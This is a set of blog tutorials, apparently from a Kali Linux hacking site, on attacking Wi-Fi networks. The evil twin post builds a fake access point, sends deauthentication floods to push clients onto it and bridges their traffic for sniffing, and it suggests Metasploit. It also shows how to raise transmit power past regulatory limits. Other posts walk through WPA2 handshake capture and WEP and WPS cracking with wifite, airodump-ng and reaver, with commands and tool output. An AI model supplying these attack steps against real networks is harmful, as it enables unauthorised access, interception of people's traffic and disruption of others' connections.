Evil Twin Tutorial

Prerequisites

1. Kali Linux
2. Prior experience with wireless hacking

You will also need to install a tool (bridge utils) which doesn't come pre-installed in Kali. No big deal-

apt-get install bridge-utils

Objectives

The whole process can be broken down into the following steps-

1. Finding out about the access point (AP) you want to imitate, and then actually imitating it (i.e. creating another access point with the same SSID and everything). We'll use airmon-ng for finding necessary info about the network, and airbase-ng to create it's twin.
2. Forcing the client to disconnect from the real AP and connecting to yours. We'll use aireplay-ng to deauthenticate the client, and strong signal strength to make it connect to our network.
3. Making sure the client doesn't notice that he connected to a fake AP. That basically means that we have to provide internet access to our client after he has connected to the fake wireless network. For that we will need to have internet access ourselves, which can be routed to out client.
4. Have fun - monitor traffic from the client, maybe hack into his computer using metasploit. 

PS: The first 3 are primary objectives, the last one is optional and not a part of evil twin attack as such. It is rather a man in the middle attack. Picture credits : firewalls.com

Information Gathering - airmon-ng

To see available wireless interfaces-

iwconfig

To start monitor mode on the available wireless interface (say wlan0)-

airmon-ng start wlan0

To capture packets from the air on monitor mode interface (mon0)

 airodump-ng mon0

 After about 30-40 seconds, press ctrl+c and leave the terminal as is. Open a new terminal.

Creating the twin

Now we will use airbase-ng to create the twin network of one of the networks that showed up in the airodump-ng list. Remember, you need to have a client connected to the network (this client will be forced to disconnect from that network and connect to ours), so choose the network accordingly. Now after you have selected the network, take a note of it's ESSID and BSSID. Replace them in given code-

airbase-ng -a <BSSID here> --essid <ESSID here> -c <channel here> <interface name>

If you face any problems, a shorter code will be-

airbase-ng --essid <name of network> mon0 

Remove the angular brackets (< & >) and choose any channel that you want. Also, the BSSID can be randomly selected too, and doesn't have to match with the target. The interface would be mon0 (or whatever is the card you want to use) . The only thing identical about the twins has to be their ESSIDs (which is the name of the network). However, it is better to keep all parameters same to make it look more real. After you are done entering the parameters and running the command, you'll see that airbase turned your wireless adapter into an access point.
Note : We will need to provide internet access to our client at a later stage. Make sure you have a method of connecting to the net other than wireless internet, because your card will be busy acting like an AP, and won't be able to provide you with internet connectivity. So, either you need another card, or broadband/ADSL/3G/4G/2G internet.

Man in the middle attack : Pic Credits:  owasp.net

Telling the client to get lost

Now we have to ask the client to disconnect from that AP. Our twin won't work if the client is connected to the other network. We need to force it to disconnect from the real network and connect to the twin.

For this, the first part is to force it to disconnect. Aireplay will do that for us-

aireplay-ng --deauth 0 -a <BSSID> mon0 --ignore-negative-one

The 0 species the time internal at which to send the deauth request. 0 means extremely fast, 1 would mean send a packet every 1 seconds, 2 would mean a packet every 2 seconds, and so on. If you keep it as 0, then your client would be disconnected in a matter of seconds, so fire up the command, and press ctrl+c after a few seconds only. Note that the deauth is sent on broadcast, so all the clients (not just one) connected to the network will disconnect. Disconnecting a specific client is also possible.

Not the real one, but why the fake one

Even after being disconnected from the real AP, the client may choose to keep trying to connect to the same AP a few more times, instead of trying to connect to ours. We need to make our AP stand out, and for that, we need more signal strength. There are 2 ways to do that-

1. Physically move closer to the client.
2. Power up your wireless card to transmit at more power. 

The latter can be done with the following command -

iwconfig wlan0 txpower 27

Here 27 is the transmission power in dBm. Some cards can't transmit at high power, and some can transmit at extremely high power. Alfa cards usually support upto 30dBm, but many countries don't allow the card to transmit at such powers. Try changing 27 to 30 and you'll see what I mean. In Bolivia, however, you can transmit at 30dBm, and by changing the regulatory domain, we can overcome the power limitation.

iw reg set BO

iwconfig wlan0 txpower 30

It is strongly advised to not break laws as the transmission limits are there for a reason, and very high power can be harmful to health (I have no experimental evidence). Nevertheless, the client should connect to you if your signal strength is stronger than that you the real twin.

Note : If you are unable to get your client to connect to you, there is another option. You can leave him with no options. If you keep transmitting the deauth packets continuously (i.e. don't press ctrl+c after the client has disconnected), he will have no choice but to connect to you. However, this is quite an unstable situation, and the client will go back to the real twin as soon as it gets the chance.

Give the fake AP internet access

Now we need to provide internet access to the fake AP. This can be done in various ways. In this tutorial, we will consider that we have an interface x0 which has internet connectivity. Now, if you are connected to net via wireless, replace x0 with wlan1 or wlan0, a 3G modem will show up as ppp0. Nevertheless, you just have to know which interface is providing you with internet, and you can route the internet access to your client.

Interfaces

• x0 - This has internet access
• at0 - This is create by airbase-ng (wired face of the wireless access point). If you can somehow give internet access to at0, then the clients connected to your fake wireless network can connect to the net.
• evil - This is an interface that we will create, whose job will be to actually bridge the networks.

Creating evil

We will use Bridge control utility provided by Kali, brctl. Execute the following code-

brctl addbr evil

This will create the bridge. Now we have to specify which two interfaces have to be bridged-

brctl addif evil x0

brctl addif evil at0

We can assign an IP to the interfaces and bring them up using-

ifconfig x0 0.0.0.0 up 

ifconfig at0 0.0.0.0 up

 Also bring up the evil interface (the interfaces aren't always up by default so we have to do this many times)

ifconfig evil up

Now to auto configure all the complicated DHCP settings, we'll use dhclient

dhclient3 evil & 

Finally, all the configurations have been completed. You can execute ifconfig and see the results, which will show you all the interfaces you have created.
Officially, the evil twin attack is complete. The client is now connected to your fake network, and can use the internet pretty easily. He will not have any way to find out what went wrong. However, the last objective remains.

Have fun

Now that the client is using the internet via our evil interface, we can do some evil stuff. This actually comes under a Man In The Middle attack (MITM), and I'll write a detailed tutorial for it later. However, for the time being, I will give you some idea what you can do.

Sniffing using Wireshark

Now all the packets that go from the user to the internet pass through out evil interface, and these packets can be monitored via wireshark. I won't teach you how to use it here, since it is a GUI tool. You can take a look at their website to get an idea on how to use wireshark. Pic credits: The picture on the right has been directly taken from their website. 

http://www.wireshark.org/docs/wsug_html_chunked/ChapterIntroduction.html

Special Thanks

Matthew Bernard for his useful comment with some tips and a number of corrections http://www.kalitutorials.net/2014/07/evil-twin-tutorial.html?showComment=1406591245609#c5539483407421385761
The screenshots have also been taken by him and provided to me for usage (I would love to see more helpful visitors like him).

Read full post »

Hack WPA-2 PSK Capturing the Handshake

 WPA password hacking

Okay, so hacking WPA-2 PSK involves 2 main steps-

1. Getting a handshake (it contains the hash of password, i.e. encrypted password)
2. Cracking the hash.

Now the first step is conceptually easy. What you need is you, the attacker, a client who'll connect to the wireless network, and the wireless access point. What happens is when the client and access point communicate in order to authenticate the client, they have a 4 way handshake that we can capture. This handshake has the hash of the password. Now there's no direct way of getting the password out of the hash, and thus hashing is a robust protection method. But there is one thing we can do. We can take all possible passwords that can exists, and convert them to hash. Then we'll match the hash we created with the one that's there in the handshake. Now if the hashes match, we know what plain text password gave rise to the hash, thus we know the password. If the process sounds really time consuming to you, then its because it is. WPA hacking (and hash cracking in general) is pretty resource intensive and time taking process. Now there are various different ways cracking of WPA can be done. But since WPA is a long shot, we shall first look at the process of capturing a handshake. We will also see what problems one can face during the process (I'll face the problems for you). Also, before that, some optional wikipedia theory on what a 4-way handshake really is (you don't want to become a script kiddie do you?)

The Four-Way Handshake

The authentication process leaves two considerations: the access point (AP) still needs to authenticate itself to the client station (STA), and keys to encrypt the traffic need to be derived. The earlier EAP exchange or WPA2-PSK has provided the shared secret key PMK (Pairwise Master Key). This key is, however, designed to last the entire session and should be exposed as little as possible. Therefore the four-way handshake is used to establish another key called the PTK (Pairwise Transient Key). The PTK is generated by concatenating the following attributes: PMK, AP nonce (ANonce), STA nonce (SNonce), AP MAC address, and STA MAC address. The product is then put through PBKDF2-SHA1 as the cryptographic hash function.
The handshake also yields the GTK (Group Temporal Key), used to decrypt multicast and broadcast traffic. The actual messages exchanged during the handshake are depicted in the figure and explained below:

1. The AP sends a nonce-value to the STA (ANonce). The client now has all the attributes to construct the PTK.
2. The STA sends its own nonce-value (SNonce) to the AP together with a MIC, including authentication, which is really a Message Authentication and Integrity Code: (MAIC).
3. The AP sends the GTK and a sequence number together with another MIC. This sequence number will be used in the next multicast or broadcast frame, so that the receiving STA can perform basic replay detection.
4. The STA sends a confirmation to the AP.

All the above messages are sent as EAPOL-Key frames.
As soon as the PTK is obtained it is divided into five separate keys:
PTK (Pairwise Transient Key – 64 bytes)

1. 16 bytes of EAPOL-Key Confirmation Key (KCK)– Used to compute MIC on WPA EAPOL Key message
2. 16 bytes of EAPOL-Key Encryption Key (KEK) - AP uses this key to encrypt additional data sent (in the 'Key Data' field) to the client (for example, the RSN IE or the GTK)
3. 16 bytes of Temporal Key (TK) – Used to encrypt/decrypt Unicast data packets
4. 8 bytes of Michael MIC Authenticator Tx Key – Used to compute MIC on unicast data packets transmitted by the AP
5. 8 bytes of Michael MIC Authenticator Rx Key – Used to compute MIC on unicast data packets transmitted by the station

The Michael MIC Authenticator Tx/Rx Keys provided in the handshake are only used if the network is using TKIP to encrypt the data.


 By the way, if you didn't understand much of it then don't worry. There's a reason why people don't  search for hacking tutorials on Wikipedia (half the stuff goes above the head)

Capturing The Handshake

Now there are several (only 2 listed here) ways of capturing the handshake. We'll look at them one by one-

1. Wifite (easy and automatic)
2. Airodump-ng (easy but not automatic, you manually have to do what wifite did on its own)

Wifite

Methodology

We'll go with the easy one first. Now you need to realize that for a handshake to be captured, there needs to be a handshake. Now there are 2 options, you could either sit there and wait till a new client shows up and connects to the WPA network, or you can force the already connected clients to disconnect, and when they connect back, you capture their handshake. Now while other tutorials don't mention this, I will (such a good guy I am :) ). Your network card is good at receiving packets, but not as good in creating them. Now if your clients are very far from you, your deauth requests (i.e. please get off this connection request) won't reach them, and you'll keep wondering why you aren't getting any handshake (the same kind of problem is faced during ARP injection and other kind of attacks too). So, the idea is to be as close to the access point (router) and the clients as possible. Now the methodology is same for wifite and airodump-ng method, but  wifite does all this crap for you, and in case of airodump-ng, you'll have to call a brethren (airreply-ng) to your rescue. Okay enough theory.

Get the handshake with wifite

Now my configuration here is quite simple. I have my cellphone creating a wireless network named 'me' protected with wpa-2. Now currently no one is connected to the network. Lets try and see what wifite can do.

root@kali:~# wifite
  .;'                     `;,
 .;'  ,;'             `;,  `;,   WiFite v2 (r85)
.;'  ,;'  ,;'     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'
           /       \        


 [+] scanning for wireless devices...
 [+] enabling monitor mode on wlan0... done
 [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
 [0:00:04] scanning wireless networks. 0 targets and 0 clients found

 [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  me                     1  WPA2  57db   wps
    2  *******              11  WEP   21db    no   client
    3  **************   11  WEP   21db    no

Now as you can see, my network showed up as 'me'. I pressed ctrl+c and wifite asked me which target to attack (the network has wps enabled. This is an added bonus, reaver can save you from all the trouble. Also, wifite will use reaver too to skip the whole WPA cracking process and use a WPS flaw instead. We have a tutorial on hacking WPA WPS using Reaver already, in this tutorial we'll forget that this network has WPS and capture the handshake instead)
[+] select target numbers (1-3) separated by commas, or 'all':
Now I selected the first target,  i.e. me. As expected, it had two attacks in store for us. First it tried the PIN guessing attack. It has almost 100% success rate, and would have given us the password had I waited for 2-3 hours. But I pressed ctrl+c and it tried to capture the handshake. I waited for 10-20 secs, and then pressd ctrl+c. No client was there so no handshake could be captured. Here's what happened.

[+] 1 target selected.
 [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:24] WPS attack, 0/0 success/ttl,
 (^C) WPS brute-force attack interrupted
 [0:08:20] starting wpa handshake capture on "me"
 [0:08:05] listening for handshake...                
 (^C) WPA handshake capture interrupted
 [+] 2 attacks completed:
 [+] 0/2 WPA attacks succeeded
 [+] disabling monitor mode on mon0... done
 [+] quitting

Now I connected my other PC to 'me'. Lets do it again. This time a client will show up, and wifite will de-authenticate it, and it'll try to connect again. Lets see what happens this time around.

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  *    1  WPA   99db    no   client
    2  me  1 WPA2  47db   wps   client
    3  *    11  WEP   22db    no   clients
    4  *   11  WEP   20db    no

 [+] select target numbers (1-4) separated by commas, or 'all': 2
 [+] 1 target selected.
 [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:07] WPS attack, 0/0 success/ttl,
 (^C) WPS brute-force attack interrupted
 [0:08:20] starting wpa handshake capture on "me"
 [0:07:51] listening for handshake...                
 (^C) WPA handshake capture interrupted
 [+] 2 attacks completed:
 [+] 0/2 WPA attacks succeeded
 [+] quitting

Now the deauth attacks weren't working. This time I increased the deauth frequency.
root@kali:~# wifite -wpadt 1
Soon, however, I realized, that the problem was that I was using my internal card (Kali Live USB). It does not support packet injection, so deauth wasn't working. So time to bring my external card to the scene.

root@kali:~# wifite
  .;'                     `;,
 .;'  ,;'             `;,  `;,   WiFite v2 (r85)
.;'  ,;'  ,;'     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'
           /       \        


 [+] scanning for wireless devices...
 [+] available wireless devices:
  1. wlan1        Ralink RT2870/3070    rt2800usb - [phy1]
  2. wlan0        Atheros     ath9k - [phy0]
 [+] select number of device to put into monitor mode (1-2):

See, we can use the USB card now. This will solve the problems for us.
Now look at wifite output

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  me                     1  WPA2  44db   wps   client
    2  *                       11  WEP   16db    no   client
    3  *                         11  WEP   16db    no

 [+] select target numbers (1-3) separated by commas, or 'all':
Now I attack the target. This time, finally, I captured a handshake.
 [+] 1 target selected.
 [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:01] WPS attack, 0/0 success/ttl,
 (^C) WPS brute-force attack interrupted
 [0:08:20] starting wpa handshake capture on "me"
 [0:07:23] listening for handshake...                
 [0:00:57] handshake captured! saved as "hs/me_02-73-8D-**-**-**.cap"
 [+] 2 attacks completed:
 [+] 1/2 WPA attacks succeeded
        me (02:73:8D:37:A7:ED) handshake captured
        saved as hs/me_02-73-8D-**-**-**.cap
   
 [+] starting WPA cracker on 1 handshake
 [!] no WPA dictionary found! use -dict <file> command-line argument
 [+] disabling monitor mode on mon0... done
 [+] quitting

As you can see, it took me 57 seconds to capture the handshake (5 deauth requests were sent, one every 10 secs is defualt). The no dictionary error shouldn't bother you. We'll use Wifite only to capture the handshake. Now the captured handshake was saved as a .cap file which can be cracked using aircrack, pyrit, hashcat (after converting .hccap), etc. using either a wordlist or bruteforce. Let's see how to do the same thing with airodump-ng. This time I won't show you the problems you might run into. It'll be a perfect ride, all the problems were seen in wifite case.

Capturing Handshake with Airodump-ng

Now if you skipped everything and got right here, then you are missing a lot of things. I'll end this pretty quick, as the wifite thing was quite detailed. I'm copying stuff from http://www.kalitutorials.net/2013/08/wifi-hacking-wep.html where I already discussed airodump-ng. (If you are not a newbie, skip to the point where you see red text)

1. Find out the name of your wireless adapter.

Alright, now, your computer has many network adapters, so to scan one, you need to know its name. So there are basically the following things that you need to know-

• lo - loopback. Not important currently.
• eth - ethernet
• wlan - This is what we want. Note the suffix associated.

Now, to see all the adapters, type ifconfig on a terminal. See the result. Note down the wlan(0/1/2) adapter.

Trouble with the wlan interface not showing up. This is because virtual machines can't use internal wireless cards and you will have to use external cards. You should try booting Kali using Live USB (just look at the first part of this tutorial), or buy an external card.

2. Enable Monitor mode

Now, we use a tool called airmon-ng to  create a virtual interface called mon. Just type 

airmon-ng start wlan0

 Your mon0 interface will be created.

3. Start capturing packets

Now, we'll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You'll see the name of the wifi you want to hack.

airodump-ng mon0

4. Store the captured packets in a file 

This can be achieved by giving some more parameters with the airodump command

airodump-ng mon0 --write name_of_file

Non newbies-
root@kali:~# airmon-ng start wlan1
root@kali:~# airodump-ng mon0 -w anynamehere

 Now copy the bssid field of your target network (from airodump-ng ng screen)and launch a deauth attack with aireplay-ng

 root@kali:~# aireplay-ng --deauth 0 -a BSSID here mon0

The --deauth tells aireplay to launch a deauth attack. 0 tell it to fire it at interval of 0 secs (very fast so run it only for a few secs and press ctrl+c). -a will required BSSID and replace BSSID here with your target BSSID. mon0 is the interface you created.
In case you face problems with the monitor mode hopping from one channel to another, or problem with beacon frame, then fix mon0 on a channel using-
root@kali:~# airodump-ng mon0 -w anynamehere -c 1
Replace 1 with the channel where your target AP is. You might also need to add --ignore-negative-one if aireplay demands it. In my case airodump-ng says fixed channel mon0: -1 so this was required. (It's a bug with aircrack-ng suite).

Now when you look at the airodump-ng screen, you'll see that at the top right it says WPA handshake captured . Here is what it looks like

 CH  1 ][ Elapsed: 24 s ][ 2014-06-13 22:41 ][ WPA handshake: **                                    
                                                                                                                                                
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                
 02:73:8D:37:A7:ED  -47  75      201       35    0   1  54e  WPA2 CCMP   PSK  me                                                                
                                                                                                                                                
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                      
                                                                                                                                                
 *                     *                            0    0e- 1    742       82  me                                                                          
*                       *                           -35  0e- 1      0   26                                                                                   

You can confirm it by typing the following

root@kali:~# aircrack-ng anynamehere-01.cap
Opening anynamehere-01.cap
Read 212 packets.
   #  BSSID              ESSID                     Encryption
   1  **************  me                        WPA (1 handshake)
   2  **                          Unknown

Happy cracking, all that needs to be done in this tutorial has been done. Its been a long one. Hope it helped you.

Read full post »

Wifite : Hacking Wifi The Easy Way : Kali Linux

Wifite

While the aircrack-ng suite is a well known name in the wireless hacking , the same can't be said about Wifite. Living in the shade of the greatness of established aircrack-ng suite, Wifite has finally made a mark in a field where aircrack-ng failed. It made wifi hacking everyone's piece of cake. While all its features are not independent (eg. it hacks WPS using reaver), it does what it promises, and puts hacking on autopilot. I'm listing some features, before I tell you how to use wifite (which I don't think is necessary at all, as anyone who can understand simple English instructions given by Wifite can use it on his own).

Features Of Wifite

• Sorts targets by signal strength (in dB); cracks closest access points first
• Automatically de-authenticates clients of hidden networks to reveal SSIDs
• Numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
• Customizable settings (timeouts, packets/sec, etc)
• "Anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete
• All captured WPA handshakes are backed up to wifite.py's current directory
• Smart WPA de-authentication; cycles between all clients and broadcast deauths
• Stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit
• Displays session summary at exit; shows any cracked keys
• All passwords saved to cracked.txt
• Built-in updater: ./wifite.py -upgrade

I find it worth mentioning here, that not only does it hack wifi the easy way, it also hack in the best possible way.  For example, when you are hacking a WEP wifi using Wifite, it uses fakeauth and uses the ARP method to speed up data packets (I wrote a full length post about something which it does automatically!).

Hacking WEP network

If you've followed my previous posts on Hacking Wifi (WEP), you know there's a lot of homework you have to do before you even start hacking. But not here. With Wifite, its as easy and simple as a single command.

wifite -wep

You might even have used the command

wifite

If you see any error at this stage move to the bottom of the page for troubleshooting tips. If your issue is not listed please comment. We reply within a day.
The -wep makes it clear to wifite that you want to hack WEP wifis only. It'll scan the networks for you, and when you think it has scanned enough, you can tell it to stop by typing ctrl+c. It'll then ask you which wifi to hack. In my case, I didn't specify -wep so it shows all the wifis in range.

 You can also select all and then go take a nap (or maybe go to sleep). When you wake up, you might be hacking all the wifi passwords in front of you. I typed one and it had gathered 7000 IVs (data packets) within 5 mins. Basically you can except it to hack the wifi in 10 mins approx. Notice how it automatically did the fake auth and ARP replay.

Here are a few more screenshots of the working of Wifite, from their official website (./wifite.py is not something that should bother you. You can stick with the simple wifite. Also, specifying the channel is optional so even the -c 6 was unnecessary. Notice that instead of ARP replay, the fragmentation attack was used, using -frag) -

 Hacking WPS wasn't fast (it took hours), but it was easy and didn't require you to do anything but wait.

 Note, the limitation that many reader on my blog are beginners forbid me from introducing too many attacks. I made a tutorial about ARP replay attack, and that too was detailed as hell. However, Wifite makes it possible for you to use any method that you want to use, by just naming it. As you saw in the screenshot above, the fragmentation attack was carried out just by typing -frag. Similarly, many other attacks can be played with. A good idea would be to execute the following-

wifite -help

This will tell you about the common usage commands, which will be very useful. Here is the list of WEP commands for different attacks-
    WEP
-wep         only target WEP networks [off]
-pps <num>   set the number of packets per second to inject [600]
-wept <sec> sec to wait for each attack, 0 implies endless [600]
-chopchop   use chopchop attack      [on]
-arpreplay   use arpreplay attack     [on]
-fragment   use fragmentation attack [on]
-caffelatte use caffe-latte attack   [on]
-p0841       use -p0841 attack        [on]
-hirte       use hirte (cfrag) attack [on]
-nofakeauth stop attack if fake authentication fails    [off]
-wepca <n>   start cracking when number of ivs surpass n [10000]
-wepsave     save a copy of .cap files to this directory [off]

As you can see, its the same thing as is there on the help screenshot. Play around with the attacks and see what you can do. Hacking WPA without WPS wouldn't be that easy, and while I don't usually do this, I'm providing a link to an external website for the tutorial . This is the best WPA cracking tutorial I've seen, and I can't write a better one. It's highly detailed, and I'm just hoping I don't lose my audience to that website. Here is the tutorial - Cracking Wifi WPA/WPA2 passwords using pyrit cowpatty in Kali Linux

Troubleshooting

Wifite quits unexpectedly, sating "Scanning for wireless devices. No wireless interfaces were found. You need to plug in a wifi device or install drivers. Quitting."

You are using Kali inside a virtual machine most probably. Virtual machine does not support internal wireless card. Either buy an external wireless card, or do a live boot / side boot with Windows. Anything other than Virtual machine in general.

Read full post »

Hack WPA/WPA2 WPS - Reaver - Kali Linux

WPA/WPA-2

When it was known that a WEP network could be hacked by any kid with a laptop and a network connection (using easy peasy tutorials like those on our blog), the security guys did succeed in making a much more robust security measure WPA/WPA2.

Now hacking WPA/WPA2 is a very tedious job in most cases. A dictionary attack may take days, and still might not succeed. Also, good dictionaries are huge. An exhaustive bruteforce including all the alphabets (uppercase lowercase) and numbers, may take years, depending on password length. Rainbow tables are known to speed things up, by completing a part of the guessing job beforehand, but the output rainbow table that needs to be downloaded from the net is disastrously large (can be 100s of GBs sometimes). And finally the security folks were at peace. But it was not over yet, as the new WPA technology was not at all easy for the users to configure. With this in mind, a new security measure was introduced to compliment WPA. Wifi Protected Setup (WPS). Now basically it was meant to make WPA even tougher to crack, and much easier to configure (push a button on router and device connects). However, it had a hole, which is now well known, and tools like reaver can exploit it in a single line statement. It still might take hours, but it is much better than the previous scenario in which months of brute-forcing would yield no result.



Here's what wikipedia says about WPS-
Created by the Wi-Fi Alliance and introduced in 2006, the goal of the protocol is to allow home users who know little of wireless security and may be intimidated by the available security options to set up Wi-Fi Protected Access, as well as making it easy to add new devices to an existing network without entering long passphrases. Prior to the standard, several competing solutions were developed by different vendors to address the same need. A major security flaw was revealed in December 2011 that affects wireless routers with the WPS feature, which most recent models have enabled by default. The flaw allows a remote attacker to recover the WPS PIN in a few hours with a brute-force attack and, with the WPS PIN, the network's WPA/WPA2 pre-shared key. Users have been urged to turn off the WPS feature, although this may not be possible on some router models.

 Working Of WPS

Now while most of the things are the same as in WPA, there is a new concept of using pins for authentication. So basically, the client sends 8 digit pins to the access point, which verifies it and then allows the client to connect. Now a pin has 8 digits, and only contains numbers, so its a possible target for bruteforece. Under normal bruteforcing of WPA passwords, you have to consider the fact that there may be number, alphabets, and sometimes symbols (and more than 8 letters). This make the task a billion billion times tougher. However, we can try thousands of keys per second, which make it a tad bit easier. Now in WPS, there is a delay because we have to wait for APs response, and we may only try a few keys per second (practically the best I've seen on my PC is 1 key per 2 sec). Basically, 8 digits and 10 possibilities per digit (0-9) make it 10^8 (interpret ^ as raised to the power of)seconds if we assume one key per second. Now that'll be years. So, where is this taking us? The answer is, there are flaws in this technology that can be used against it. 

• The 8th digit is a checksum of first 7 digits. 10^7 possibilities, i.e. one-tenth time. Two months, still a way to go.
• The pin number for verification goes in two halves, so we can independently verify the first four and the last four digits. And believe me, its easy to guess 4 digits correct two times, than to guess 8 correct digits at once. Basically, the first half would take 10^4 guess and the second would take 10^3.

Now the guesses would be 10^4 + 10^3 (not 10^4 *10 ^3). Now we need 11,000 guesses.

So that'll take 3 hours approximately. And that's all the combinations, and most probably the correct pin will not be the last combination, so you can expect to reach the result earlier. However, the assumption is that bruteforcing will take place at a key per second. My personal best is a key every 2 seconds, and yours might drop to as low as a key every 10 seconds. 

How to carry out the attack

Now it might have been tough to carry out this attack at some point in history, but now, its a breeze. If you have all the prerequisites, then hacking the network would be as easy as

reaver -i <interface-name> -b <BSSID of target>

And if you are already familiar with hacking WEP, then just go to your Kali Linux terminal and type the above command (replacing what needs to be replaced). Leave your machine as is, come back 10 mins later, check the progress (must be 1% or  something), and go take a nap. However, if you're a newbie, then tag along.

Kali Linux

First off, you need to have Kali linux (or backtrack) up and running on your machine. Any other Linux distro might work, but you'll need to install Reaver on your own. Now if you don't have Kali Linux installed, you might want to go to this page, which will get you started on hacking with Kali Linux. (Reaver has a known issue : Sometimes it doesn't work with Virtual Machines, and you might have to do a live boot using live CD or live USB of Kali Linux. See the last section of this post on = troubleshooting by scrolling down a bit)

Information Gathering

Now you need to find out the following about you target network-

• Does it have WPS enabled. If not, then the attack will not work.
• The BSSID of the network.

Now to check whether the network has WPS enabled or not, you can either use wash or just use the good old airodump-ng. Wash is specifically meant to check whether a network has WPS enabled or not, and thereby is much easier to use. Here are the steps-

• Set your wireless interface in monitor mode- 

airmon-ng start wlan0

•  Use wash (easy but sometimes unable to detect networks even when they have wps enabled). If any network shows up there, it has WPS enabled.

wash -i mon0

This will show all the networks with WPS enabled

This is an error which I haven't figured out yet. If you see it, then you'll have to do some howework, or move on to airodump method. Update :  wash -i mon0 --ignore-fcs  might solves the issue.

• Use airodump-ng. It will show all networks around you. It tells which of them use WPA. You'll have to assume they have WPS, and then move to next steps.

airodump-ng mon0

None of them has WPS enabled, just saying.

BSSID of the network - Now irrespective of what you used, you should have a BSSID column in the result that you get. Copy the BSSID of the network you want to hack. That's all the information you need.

So by now you must have something like XX:XX:XX:XX:XX:XX, which is the BSSID of your target network. Keep this copied, as you'll need it.

Reaver

Now finally we are going to use Reaver to get the password of the WPA/WPA2 network. Reaver makes hacking very easy, and all you need to do is enter-

reaver -i mon0 -b XX:XX:XX:XX:XX:XX 

Explanation = i  - interface used. Remember creating a monitor interface mon0 using airmon-ng start wlan0. This is what we are using. -b species the BSSID of the network that we found out earlier.
This is all the information that Reaver need to get started. However, Reaver comes with many advanced options, and some are recommended by me. Most importantly, you should use the -vv option, which increases the verbosity of the tool. Basically, it writes everything thats going on to the terminal. This helps you see whats happening, track the progress, and if needed, do some troubleshooting.  So final command should be-

reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv

After some hours, you will see something like this. The pin in this case was intentionally 12345670, so it was  hacked in 3 seconds.

Here is an extra section, which might prove useful (or more like consoling, to let you know you are not the only one who is having troubles)

Known problems that are faced - Troubleshooting

1. As in the pic above, you saw the first line read "Switching wlan0 to channel 6". (Yours will be mon0 instead of wlan0). Sometimes, it keeps switching interfaces forever.
2. Sometimes it never gets a beacon frame, and gets stuck in the waiting for beacon frame stage.
3. Sometimes it never associates with the target AP.
4. Sometimes the response is too slow, or never comes, and a (0x02) or something error is displayed.

In most cases, such errors suggest-

1. Something wrong with wireless card.
2. AP is very choosy, won't let you associate.
3. The AP does not use WPS.
4. You are very far from the AP.

Possible workarounds-

1. Sometimes, killing naughty processes helps. (see pictures below)
2. Move closer to target AP
3. Do a fakeauth using aireplay-ng (Check speeding up WEP hacking) and tell Reaver not to bother as we are already associated using -A (just add -A at the end of your normal reaver code)
4. If you are using Kali Linux in Vmware, try booting into Kali using USB. I don't know why, but sometimes internal adapters work wonders, and can't be used from inside of a VM. In my case, booting up from USB and using internal adapter increased the signal strength and speeded up the bruteforce process. Update : It has nothing to do with internal adapter. I have verified my observation with various hackers, and it is now a known problem with Reaver. It does not work well inside Virtual machines. It is recommended that you do a live boot.

processes causing problems

Kill 'em all

All that I have written above (the troubleshooting section) is based on personal experience, and might not work. All the problems mentioned above, are well known on forums, and no 100% working solution could be found anywhere (I do my homework before posting). If you are aware of solution to any of these, do comment (anonymous comments are enabled)

Read full post »

Speeding Up WEP Hacking In Kali

Now if you have followed the basic WEP hacking tutorial, and have also read the basic troubleshooting guide, then you are ready to proceed to the stage where you follow an intermediate level hacking tutorial. In this tutorial, we will look at the intricate details of what is happening and approach the complicated methods and concepts.




To start with, I'll address a common question which was asked on my previous posts.

14 March 2014 19:28

i couldn't find any wlan when i write ifconfig in terminal

1. 
   
   
   
   
   Are you using Kali Linux on a virtual machine. Please note that a wireless adapter can only be used by only one machine at a time. Your host machine has access to the wireless adapter, not the virtual machine. This question has been discussed at length on superuser forums. The conclusion is that you can't directly connect internal wifi card using any Virtual machine software-
   "Unfortunately no virtualization software allows for direct access to hardware devices like that.
   
   Compare VirtualBox with VMware Fusion and Parallels for Mac. All 3 of those programs behave the same way. The only devices that can be directly accessed are usb devices. Everything else is abstracted though the virtualization engine. (Though you could argue that the vm has lower level access to cd rom's and storage devices).
   
   I wish I could give you a better answer, than simply to buy a usb wireless card."
   Basically you have to buy an external wireless card. They aren't very expensive. I personally use two of them myself. If you want to see what I use, take a look here, http://beginnnerhacking.blogspot.in/2014/02/creating-dummy-wifi-for-hacking.html

So basically you have 2 choices. First, you can buy a new external wireless adapter (no referral links here). Secondly, you can side install Kali with Windows or run it via a USB. A virtual machine can only use computer hardware if it is externally connected via USB. Now there is another catch here. The internal adapters, almost all of them, don't support injection. This is extremely important for speeding up wireless hacking. So if you really want to go in depth of wireless hacking, then its time to buy an external adapter or two (the more the better). If that's not a possibility, you might want to spend hours trying to get a driver which might make your internal adapter support injection (I don't know anyone who succeeded in this, but it might be possible).

Kali Linux

I don't know why it needs mention here, but still, if you don't have Kali Linux (or Backtrack) installed yet, you will have to install it before you can start this tutorial. Here is the tutorial on Kali Linux hacking.

